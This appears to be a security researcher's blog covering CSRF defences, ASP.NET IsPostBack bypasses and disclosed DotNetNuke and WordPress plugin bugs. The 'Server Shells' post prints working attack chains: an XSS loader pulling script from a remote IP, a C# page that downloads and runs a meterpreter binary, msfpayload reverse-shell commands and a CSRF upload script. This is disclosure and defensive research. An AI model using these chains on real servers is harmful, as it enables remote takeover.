Analysis of John Wilander’s Triple Submit Cookies

TLDR

At OWASP AppSec Research, John Wilander recently presented an interesting CSRF mitigation – an enhancement to double submit that he calls "triple submit". It's not implemented yet, but the idea would mitigate some of the problems with a naive double submit algorithm. This post takes a look at it and comes away with the conclusion that triple submit is an improvement over a naive double submit implementation, but doesn't mitigate CSRF as well as other widespread stateless solutions already in use.

Background

Double submit cookie mitigations to CSRF are common, and implementations can vary a lot. The solution is tempting because it's scalable and easy to implement. One of the most common variations is the naive:

if (cookievalue != postvalue)
    throw CSRFCheckError

The problem: if an attacker can write a cookie, they can pick both values and defeat the protection. I'll refer to this as "naive double submit" for the rest of this post.

Naive double submit has a couple of weaknesses. Writing cookies is a lot easier than reading them: anyone on the same local network can write cookies, and so can anyone with an XSS in a neighboring domain. We chatted about this a bit in our 28c3/Blackhat AD talk. As part of that, I showed a bug I opened against OWA in 2010, which used to use a naive double submit implementation (and is now fixed, as is the neighbor XSS used to write the cookies). Also, check out my mad video editing skills, which I used to censor people who emailed my test account by accident and probably didn't need to be censored anyway, but that's just how I roll.

Better versions of double submit are also common. One variation is to tie the submitted values to the session identifier (e.g. the token is a hash of the session ID). ASP.NET MVC4 implements something similar to this, and I think what they do is pretty good. I dropped it into reflector to see how it's implemented.

First, in System.Web.Helpers.AntiXsrf, look at Validate:

public void Validate(HttpContextBase httpContext, string cookieToken, string formToken)
{
    this.CheckSSLConfig(httpContext);
    AntiForgeryToken token = this.DeserializeToken(cookieToken);
    AntiForgeryToken token2 = this.DeserializeToken(formToken);
    this._validator.ValidateTokens(httpContext, ExtractIdentity(httpContext), token, token2);
}

Then look at what ValidateTokens is doing:

    public void ValidateTokens(HttpContextBase httpContext, IIdentity identity, AntiForgeryToken sessionToken, AntiForgeryToken fieldToken)
    {
        if (sessionToken == null)
        {
            throw HttpAntiForgeryException.CreateCookieMissingException(this._config.CookieName);
        }
        if (fieldToken == null)
        {
            throw HttpAntiForgeryException.CreateFormFieldMissingException(this._config.FormFieldName);
        }
        if (!sessionToken.IsSessionToken || fieldToken.IsSessionToken)
        {
            throw HttpAntiForgeryException.CreateTokensSwappedException(this._config.CookieName, this._config.FormFieldName);
        }
        if (!object.Equals(sessionToken.SecurityToken, fieldToken.SecurityToken))
        {
            throw HttpAntiForgeryException.CreateSecurityTokenMismatchException();
        }
        string b = string.Empty;
        BinaryBlob objB = null;
        if ((identity != null) && identity.IsAuthenticated)
        {
            objB = this._claimUidExtractor.ExtractClaimUid(identity);
            if (objB == null)
            {
                b = identity.Name ?? string.Empty;
            }
        }
        bool flag = b.StartsWith("http://", StringComparison.OrdinalIgnoreCase) || b.StartsWith("https://", StringComparison.OrdinalIgnoreCase);
        if (!string.Equals(fieldToken.Username, b, flag ? StringComparison.Ordinal : StringComparison.OrdinalIgnoreCase))
        {
            throw HttpAntiForgeryException.CreateUsernameMismatchException(fieldToken.Username, b);
        }
        if (!object.Equals(fieldToken.ClaimUid, objB))
        {
            throw HttpAntiForgeryException.CreateClaimUidMismatchException();
        }
        if ((this._config.AdditionalDataProvider != null) && !this._config.AdditionalDataProvider.ValidateAdditionalData(httpContext, fieldToken.AdditionalData))
        {
            throw HttpAntiForgeryException.CreateAdditionalDataCheckFailedException();
        }
    }

Even given the assumption that attackers can write cookies, this is difficult to attack. It's stateless, and it does compare the cookie token to the form token, but it also extracts and validates the username, the claimUid, and any additional data. By default, one user's token won't work for another user or another session. I don't know the details of other stateless CSRF implementations, but for sites that look like they're doing things right (Gmail's CSRF protection, for example) I'd bet they do something similar.
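
For intuition, here's a minimal sketch of the underlying idea of tying a double submit token to the session – my own illustration, not the MVC4 code above, and the class and parameter names are made up. The token is an HMAC of the session ID under a server-side key, so a cookie an attacker tosses at one victim is useless for any other user or session.

public static class SessionBoundCsrfToken
{
    // serverKey is a secret that never leaves the server (e.g. loaded from configuration).
    public static string Create(string sessionId, byte[] serverKey)
    {
        using (var hmac = new System.Security.Cryptography.HMACSHA256(serverKey))
        {
            byte[] mac = hmac.ComputeHash(System.Text.Encoding.UTF8.GetBytes(sessionId));
            return System.Convert.ToBase64String(mac);
        }
    }

    // On each state-changing request, recompute the token from the current session
    // and compare it with the value submitted in the form (and/or the cookie copy).
    public static bool Validate(string sessionId, byte[] serverKey, string submittedToken)
    {
        return Create(sessionId, serverKey) == submittedToken;
    }
}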

Any proposed new CSRF protection should offer some advantage against existing commonly implemented solutions (e.g. ASP.net MVC CSRF protection). It doesn’t need to be better at everything, but it should be better at something.

Triple Submit Cookies

John Wilander recently wrote up an interesting variation on the double submit scheme called "triple submit". Thanks to John for writing this up – it's great that people are looking at this problem; web app people often don't realize how easy cookie writes can be. There's no implementation of triple submit available at the moment, but this is what I gather:

  • The value of the cookie is compared with the POST value, like a regular double submit.
  • The cookie is set with HTTP-Only.
  • There can only be exactly one cookie with the designated prefix (see the next bullet) in the request, or the request fails.
  • The name of the cookie is a fixed prefix plus a random value (e.g. random-cookie7-afcade2…).

Let’s look at these one by one.

Cookie == Post, HTTP-Only

Checking that a cookie is equal to a POST value is the same as the naive double submit solution I mentioned above. It does add security, but it has weaknesses: as I mentioned above, people in neighboring domains can write cookies, and so can people in the middle.

HTTP-Only is irrelevant in this case. The property matters when reading cookies, but it does nothing to stop an attacker from writing new ones.

Exactly One Cookie with the Prefix

The third bullet does add security when compared with the naive solution. A common attack against naive double submit is to write a cookie with an XSS in a neighboring domain (e.g. from site1.example.com against site2.example.com). If the victim is already logged in with cookies and the attacker writes a single cookie of their own, the request will contain two cookies with the prefix, which the server can detect. This is pretty good, and prevents quite a few attacks, or at least makes them a lot harder.

There are still several issues I have with this:

First, performance penalty/implementation flaws. It might be more complicated than you think to verify that exactly one cookie is being sent. A lot of (most?) web application frameworks treat reading cookies as a case-insensitive dictionary. In PHP, the $_COOKIE variable is theoretically an array of all the cookies, but if the browser sends "Cookie: csrf=foofoofoofoofoofoofoofoo; csrf=tosstosstosstosstoss; CsRf=IMDIFFERENT", the array will only contain the first one. It's similar with .NET's Request.Cookies collection, and most other server-side implementations. One example of an implementation flaw is if the code made the (unlikely) mistake of looking the cookie up by the POST value (e.g. Request.Cookies[$POST_VAL]); then an adversary could attack this the same way they'd attack naive double submit. To prevent this, it seems like triple submit would have to iterate through each cookie name/value pair and check for the prefix. What's the performance penalty? It might be negligible, but with modern applications having dozens of cookies that would have to be iterated over on every request, it's something that should be measured.
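
As a rough sketch of that iteration (my own illustration in ASP.NET terms, not anything from the proposal; the prefix and method names are made up), the check has to walk the raw Cookie header rather than the framework's cookie collection, because the collection collapses duplicate names:

// Hypothetical prefix; a real implementation would presumably make this configurable.
private const string CsrfCookiePrefix = "random-cookie7-";

// Returns true only if exactly one cookie with the prefix is present, and hands back
// its value so the caller can compare it against the POST value.
private static bool TryGetSingleCsrfCookie(System.Web.HttpRequestBase request, out string cookieValue)
{
    cookieValue = null;
    int matches = 0;

    // Walk the raw header; Request.Cookies would hide duplicate or near-duplicate names.
    string header = request.Headers["Cookie"] ?? string.Empty;
    foreach (string pair in header.Split(';'))
    {
        int eq = pair.IndexOf('=');
        if (eq < 0) continue;

        string name = pair.Substring(0, eq).Trim();
        if (name.StartsWith(CsrfCookiePrefix, System.StringComparison.OrdinalIgnoreCase))
        {
            matches++;
            cookieValue = pair.Substring(eq + 1).Trim();
        }
    }

    return matches == 1;
}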

Second, not all login methods require cookies. Say triple submit was implemented without any implementation flaws, but somebody used it to prevent CSRF on a single sign-on Kerberos/NTLM-authed website. If the victim has never visited the site, the legitimate token cookie was never set, so an attacker could toss a single cookie of the correct format (random-cookie7-…) and the exploitability would be equivalent to naive double submit. There would only be one cookie with the prefix, so the check would pass, and since it's SSO the victim is always logged in.

Third, all browser cookie jars overflow eventually. This attack would be difficult, but aren't a lot of attacks difficult when they start as ideas? Say the victim's browser had cookies that looked like this:

AuthCookie=<guid>;Name=websters;random-cookie7-<random value>=<guid>

In triple submit, the POST value has to match the cookie whose name carries the random-cookie7 prefix. One attack would be to overflow the cookie jar with some precision, so that the random-cookie7 cookie is evicted but AuthCookie is not, and then write a replacement. In the end, the cookie jar might look like the following:

random-cookie7-<attacker-value>=<attacker guid>;filler=1;filler=2;....
AuthCookie=<guid> (rest has overflowed)

Using this, an attacker could potentially bypass the CSRF protection.

Cookie Name with Prefix

The cookie name is the third thing submitted in the 'triple submit' solution. This probably doesn't add security in the neighbor-XSS case, but it does add some in the MiTM case.

It's common for people to think that if the cookie name is the same, only one cookie is written. Whenever I've tested, that isn't the case: even if the "tossed" cookie's name is identical, the browser still sends two cookies. Let's look at an example.

A legitimate site, example.com might set a cookie:

<script>
document.cookie = "csrf=foofoofoofoofoofoofoofoo; expires=Wed, 16-Nov-2013 22:38:05 GMT;";
</script>

If a neighboring site, host1.example.com tries to write a cookie with the same name:

<script>
document.cookie = "csrf=tosstosstosstosstoss; domain=.example.com; expires=Wed, 16-Nov-2013 22:38:05 GMT;";
</script>

In major browsers there now exist two cookies with the same name. In the requests to example.com it now looks something like this:

Cookie: csrf=foofoofoofoofoofoofoofoo; csrf=tosstosstosstosstoss

The point is that in the neighbor-XSS case there will almost always be more than one cookie in the request, whether the name has a hidden random component or not.

Another rarer but applicable attack is a MiTM where an attacker is trying to overwrite a secure HTTPS-only cookie from an HTTP site. This is a different story. If I'm in the middle, I can write cookies, even secure ones, as long as I know the name of the cookie. Randomizing the cookie name makes that attack quite a bit harder; the goal shifts from overwriting a specific cookie to trying to expire a random cookie whose name I don't know. However, I can still imagine attacks on an implementation of triple submit when you're in the middle:

  • If the server legitimately expires the CSRF tokens (it would probably have to at some point), you might be able to force that request.
  • If the cookies don't have expiration dates, you could crash the browser to force these cookies to expire.
  • If the random piece of the cookie name isn't very long, you could expire millions of candidates and eventually guess the right one.
  • There might also be clever SSL tricks that cut up certain responses so that an old cookie is expired but the new one isn't set (leaving you free to set one).

Speculative attacks on speculative implementations aside, with a good implementation the random name would at least make overwriting the cookie from the middle significantly more difficult.

The Simplicity Advantage?

I think the best argument in favor of triple submit versus a double submit tied to the auth tokens (e.g. MVC4) is simplicity. I don't like this argument much, for a few reasons:

  • Implementation-wise, CSRF mitigations only need to be implemented once per framework, and the implementation isn't substantially more difficult to code one way or the other.
  • You always need at least some minimal knowledge of the application. If you were to put a CSRF solution into a WAF and add it as a rule for all POST requests, what happens if the application sometimes also changes state on GET? Solutions tied to auth tokens really wouldn't be much more complicated, even in WAF-type scenarios.
  • Although the triple submit idea is simpler, I think there are quite a few more gotchas, and it seems easier to mess up. This is somewhat subjective, but I've tried to point out a few ways an implementation could go wrong in this post.

Conclusions

Triple submit is an improvement over naive double submit. Naive double submit makes some CSRF attacks more difficult to exploit, and triple submit makes many of those vectors harder still. However, there are still attack vectors that triple submit doesn't protect against – overflowing the cookie jar, CSRF against SSO auth, and probably some clever MiTM vectors. Although triple submit offers some additional security, I think it's still weaker than other existing solutions.

Interesting Problems with .NET IsPostBack()

First, credit where credit is due: Bryan Jeffries (plug here for his awesome book) talked with me about this problem a couple years ago. Since then I’ve found half a dozen bugs related to IsPostBack, but I’ve never seen the potential problems written out. Thus, this post.

What does IsPostBack Do?

The MSDN article provides some insight into how most developers will treat IsPostBack. It says, "true if the page is being loaded in response to a client postback; otherwise, false."

Here’s the snippet they include:

 private void Page_Load()
{
    if (!IsPostBack)
    {
        // Validate initially to force asterisks
        // to appear before the first roundtrip.
        Validate();
    }
}

How does this actually work? Below are a handful of test cases along with results.

Simple GET request, validate() is not called

GET /postback.aspx HTTP/1.1
Host: localhost:31907

Same with a simple POST, validate() is not called

POST /postback.aspx HTTP/1.1
Host: localhost:31907
Content-Type: application/x-www-form-urlencoded

a=1

Legitimate postback, as expected, validate() is called

POST /postback.aspx HTTP/1.1
Host: localhost:31907
Cookie: ASP.NET_SessionId=l1ghpm2rocgh0verdtbdaydc
Content-Type: application/x-www-form-urlencoded
Content-Length: 12

__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUJNjI0NjY1NDA2D2...

Here's the interesting thing: a POST with an empty viewstate, and validate() is called

POST /postback.aspx HTTP/1.1
Host: localhost:31907
Cookie: ASP.NET_SessionId=l1ghpm2rocgh0verdtbdaydc
Content-Type: application/x-www-form-urlencoded
Content-Length: 12

__VIEWSTATE=

Maybe even more interesting, a GET with an empty viewstate also results in validate() being called. So the postback doesn't even need to be a POST!

GET /postback.aspx?__VIEWSTATE= HTTP/1.1
Host: localhost:31907

If a developer takes what MSDN says at face value – that the page is being loaded in response to a client postback – they may occasionally rely on this as a security measure without realizing it.

CSRF Vector

Let's modify our earlier project a bit and compile it with .NET 3.5:

    public partial class postback : System.Web.UI.Page
    {
        protected override void OnInit(EventArgs e) 
        {
            base.OnInit(e);
            Page.ViewStateUserKey = Session.SessionID;
            
        }

        protected void Page_Load(object sender, EventArgs e)
        {
            if(!IsPostBack)
            {
                Response.Write("Error, this page is after a post");
            }
            else
            {
                Response.Write("Ok, you're cool");
                //process
            }
        }
    }

First, note that there are a lot of things //process can do: upload files, call an operation that deletes users, etc. The one caveat for our attack is that VIEWSTATE needs to be empty. There are a lot of cases where this is true with built-in .NET functions – uploading files, SQL operations, file operations, etc. just don't require VIEWSTATE to work.

Secondly, note that VIEWSTATEUSERKEY is set to the session ID. This is generally the recommended way to protect against CSRF in .NET. It's very common for developers to set this in a master page and not think about CSRF anymore – and I agree, that's the way it should be in an ideal world. But unfortunately it's not always enough. In the above project, if the request is sent with an empty VIEWSTATE then //process is still reached.

The root cause of this can be found in the HiddenFieldPageStatePersister Load method. Opening this with reflector, you can see that if requestViewStateString is empty then the check is bypassed:

    public override void Load()
    {
        if (base.Page.RequestValueCollection != null)
        {
            string requestViewStateString = null;
            try
            {
                requestViewStateString = base.Page.RequestViewStateString;
                if (!string.IsNullOrEmpty(requestViewStateString))
                {
                    Pair pair = (Pair) Util.DeserializeWithAssert(base.StateFormatter, requestViewStateString);
                    base.ViewState = pair.First;
                    base.ControlState = pair.Second;
                }
            }
            catch (Exception exception)
            {
                if (exception.InnerException is ViewStateException)
                {
                    throw;
                }
                ViewStateException.ThrowViewStateError(exception, requestViewStateString);
            }
        }
    }

This is hardened in ASP.NET 4.0, where the if statement adds a check on whether ViewStateUserKey is set:

 if (!string.IsNullOrEmpty(requestViewStateString) || !string.IsNullOrEmpty(base.Page.ViewStateUserKey))

So in .NET 4.0, this CSRF bypass shouldn't work as long as ViewStateUserKey is set.
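
For applications stuck on .NET 3.5, one rough workaround (a sketch of my own, not an official fix) is to refuse "postbacks" that arrive with an empty __VIEWSTATE, since those are exactly the requests that slip past the ViewStateUserKey check:

protected void Page_Load(object sender, EventArgs e)
{
    // IsPostBack can be true merely because a __VIEWSTATE key is present (even empty),
    // so require an actual viewstate before treating the request as a real postback.
    if (IsPostBack && string.IsNullOrEmpty(Request["__VIEWSTATE"]))
    {
        throw new HttpException(403, "Missing viewstate");
    }

    if (!IsPostBack)
    {
        Response.Write("Error, this page is after a post");
    }
    else
    {
        Response.Write("Ok, you're cool");
        //process
    }
}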

Auth Bypass Vector

A less common vector is when developers don't auth their pages properly. This can be very context-specific, but I found this problem in an admin application, and it had some very interesting consequences. A dumbed-down version of the code is the following, which could be bypassed with an empty viewstate. Again, if the actions require VIEWSTATE and event validation, the attacker is hosed. But if this is a common construct, you're bound to find some operations that don't.

protected void Page_Load(object sender, EventArgs e)
{
    if(!IsPostBack)
    {
        //authenticate user, show options based on auth
    }
    else
    {
        //process, an attacker can hit this without auth
    }
}

The assumption here is the same as in the CSRF vector: that "the page is being loaded in response to a client postback". That is what MSDN says, after all. The developers are just interpreting it a certain way :) I don't think MSDN is in the wrong here. What I do find interesting is how a non-security feature can cause a decent number of issues just because of the assumptions people make.
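
The structural fix is to authorize on every request and use IsPostBack only for flow, roughly like this (my own sketch; UserIsAdmin is a hypothetical app-specific helper):

protected void Page_Load(object sender, EventArgs e)
{
    // Authenticate and authorize unconditionally, postback or not.
    if (!User.Identity.IsAuthenticated || !UserIsAdmin(User))  // UserIsAdmin is hypothetical
    {
        Response.StatusCode = 403;
        Response.End();
        return;
    }

    if (!IsPostBack)
    {
        //show options based on auth
    }
    else
    {
        //process
    }
}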

Server Shells from Web Clientside Attacks

One kind of attack that seems to be popular these days is the “broad impact” attack. These are the vulnerabilities that include “CSRF logout on Facebook” or “Self XSS using drag and drop on code.google.com”. The impact of these attacks is sometimes limited, but that’s made up for in a big way because there are just so many people that use Google and Facebook.

This post is kind of the opposite of that.*

Remember all those bug bounties and bulletins that security researchers have got for targeting a custom support internal web application and using that to compromise everything? Oh yeah, most companies probably don’t want to encourage that sort of delinquent behavior. And although these types of attacks are not “broad impact”, the criticality of these bugs can be freaking scary.

DotNetNuke XSS to RCE

One example of this can be shown by using one of the bugs I found with DotNetNuke.

This was kind of interesting. It turns out on a default install anyone can send “messages” which are kind of like a DotNetNuke version of email. You can get script into these messages, and with script running in an administrator account you get RCE. Pretty much every piece of this is straightforward.

  • The XSS is triggered on HTML-editable pages via <img src="http://asdfasdf/blah" alt="" />
  • The host user has a lot of power, and can do things like upload arbitrary aspx pages and execute them (as shown in the demo) or execute arbitrary SQL.

Here are the repro steps for dotnetnuke 6.00.01, which was the current version when I found this:

  • Create metasploit connectback
  • Create metasploit listener
  • Start Shell of the Future… or do several requests and scrape VIEWSTATE, which is the CSRF mitigation. We can't simply steal the session cookie since it's set to HttpOnly.
  • Get XSS in the host account. The basic XSS is simply an img onerror. The payload for Shell of the Future looks like this, but before sending it needs to be HTML encoded:
 
javascript:eval("s=document.createElement('script');
s.src='http://192.168.154.137:8000/e1.js';
document.getElementsByTagName('head')[0].appendChild(s)") 
  • Using the XSS shell (or dynamically with JavaScript, if you have time), enable aspx uploads. Note that at this point SQL injection is also possible.
  • Create an RCE C# script to execute meterpreter and upload to the server.

<script type="text/javascript">// <![CDATA[
 protected override void OnLoad(EventArgs e)
 {
 System.Net.WebClient client = new System.Net.WebClient();
 client.DownloadFile(@"https://webstersprodigy.net/manuploads/test92.txt", @"C:\windows\TEMP\test92.txt");
 System.Diagnostics.Process p = new System.Diagnostics.Process();
 p.StartInfo.UseShellExecute = false;
 p.StartInfo.RedirectStandardOutput = true;
 p.StartInfo.FileName = @"C:\windows\TEMP\test92.txt";
 p.Start();
Response.Write("Success");
 }
</script>

  • Finally, force browse to the page for a shell.

They fixed this with the bulletins below, although I'm not sure I agree with the low/moderate rating, since it's pretty much a guaranteed shell as long as admins read their DotNetNuke messages.

http://www.dotnetnuke.com/News/Security-Policy/Security-bulletin-no.60.aspx

http://www.dotnetnuke.com/News/Security-Policy/Security-bulletin-no.62.aspx

WordPress MyFTP plugin CSRF to RCE

Have you ever used a piece of software, and you just know it’s hackable? That’s how I’ve been using MyFTP on this very site for a while. It’s an incredibly useful tool. It looks like it’s not super popular, but apparently the most recent version has had over 28,000 downloads at the time of this writing.

So I finally decided to look at this. It turns out everything is vulnerable to CSRF. There are several nasty exploits here. One of the easiest is being able to delete any file with the right permissions. Another easy one is being able to edit any file with the right permissions. One that’s a bit less straightforward is the file upload feature.

In this demo attack, I opted to try the file upload route using a technique I've been wanting to try for a while now: http://blog.kotowicz.net/2011/04/how-to-upload-arbitrary-file-contents.html. The idea is that you use CORS to send the cross-domain request, which gives you more control over things like headers and multipart data. The Origin header is sent, but that doesn't matter because the application ignores it.

Here are the repro steps:

1. Create Stage 1

It's super cool that Metasploit has a PHP meterpreter payload now. Generating the raw PHP looks something like this:

./msfpayload php/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 R > bad.php

But since I'm uploading this using JavaScript in step 3, I want a more JS-friendly format.

./msfpayload php/meterpreter/reverse_tcp LHOST=71.197.218.6 LPORT=443 -t pl | tr "." "+" > js_php

2. Stage 2 Listener

use exploit/multi/handler
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST x.x.x.x
exploit

3. Create a malicious page that uploads the PHP file using the CSRF bug

Using the CORs techniques mentioned above, the CSRF script will look similar to the following:

<script type="text/javascript">// <![CDATA[
function fileUpload(url, fileData, fileName) {
 var fileSize = fileData.length,
 boundary = "xxxxxxxxx",
 xhr = new XMLHttpRequest();
 xhr.withCredentials = "true";

 xhr.open("POST", url, true);
 // simulate a file MIME POST request.
 xhr.setRequestHeader("Content-Type", "multipart/form-data, boundary="+boundary);
 xhr.setRequestHeader("Content-Length", fileSize);

 var body = "--" + boundary + "rn";
 body += 'Content-Disposition: form-data; name="desiredLocation"' + 'rnrn';
 body += '/var/www/public_htmlrn';
 body += "--" + boundary + "rn";
 body += 'Content-Disposition: form-data; name="upfile"; filename="' + fileName + '"rn';
 body += 'Content-Type: text/plainrnrn';
 body += fileData + "rn";
 body += "--" + boundary + "rn";
 body += 'Content-Disposition: form-data; name="upload"rnrn';
 body += 'Upload To Current Pathrn';
 body += "--" + boundary + "--";

 xhr.send(body);
 return true;
}

//encoded stage 1 payload in JS-friendly form... from step 1
var data =
"x3cx3fx70x68x70x0ax0ax65x72x72x6fx72x5f" +
"x72x65x70x6fx72x74x69x6ex67x28x30x29x3bx0a" +
...

fileUpload('https://webstersprodigy.net/wp-admin/options-general.php?page=MyFtp&dir=/var/www/public_html/', data, 'bwahaha.php');
</script>

4. Profit

Now that the page is uploaded, visit it, and get a shell.

I reported this bug to WordPress, who have a great security team full of smart, responsive people, and this was their response, which seems like the right course of action to me:

“The security team reviewed the report and based on the nature of the vulnerability, the current state of the plugin (unmaintained, not updated), and the inability to contact the author, they have decided the best course of action is to just remove it from the plugin directory. This also means that it will not be returned in any API results, etc making it impossible to install from the built-in plugin installer in the WordPress dashboard.”

It would be cool to notify the people who have the plugin installed, but I have no idea if WordPress would even have that kind of information.

Conclusions

So let's look at the nature of these types of attacks. When you have a powerful account/application, clientside attacks may be tougher to exploit realistically (it's tougher to get a specific admin to visit your evil website than just somebody random who happens to be logged into Facebook), but there can also be a bigger payoff.

As a consumer, if you use a powerful feature, I think it's smart to run it in its own incognito session or environment so clientside attacks like these are harder to pull off. As security people trying to make the web a safer place, I think this is a bit of a blind spot: we spend a lot of time and money making the car bulletproof and then leave the doors unlocked.

*Not to diminish the “broad impact” bugs. Those are awesome too.

Is it already 2012?

I thought about starting a new blog, it’s been that long.

Giving our talk, “New ways I’m going to hack your web app” at Bluehat 2011 was awesome. I practiced so much that everything just went well. Unfortunately I managed to forget a ton of it for 28c3/Blackhat and I spoke way too fast (I always do the same thing when I get nervous and don’t think about it).  Not to mention all my favorite content was needlessly censored. That sucks, but hopefully as I talk more things will get better.

I hate watching that, by the way. The cool thing is there were a lot of people, I think the room holds about 1000. So that was scary, but also a great experience.

Here is the whitepaper:
https://skydrive.live.com/redir.aspx?cid=3ac0418833532dff&resid=3AC0418833532DFF!249&parid=3AC0418833532DFF!264

and the slides:
https://skydrive.live.com/redir.aspx?cid=3ac0418833532dff&resid=3AC0418833532DFF!250&parid=3AC0418833532DFF!264

Toorcon 2010 Talk

My over-caffeinated self somehow managed to stumble through the talk at Toorcon. I'm self-critical about the whole thing, but it was still overall a great experience, and I'm glad I did it.

I was totally nervous. This was my first ‘con’ and the room was packed (people standing at the wall), I spotted relatively famous hackers in the audience, etc. I needed more beer!

Hopefully the next one I’ll relax, slow down, not use filler words, etc :)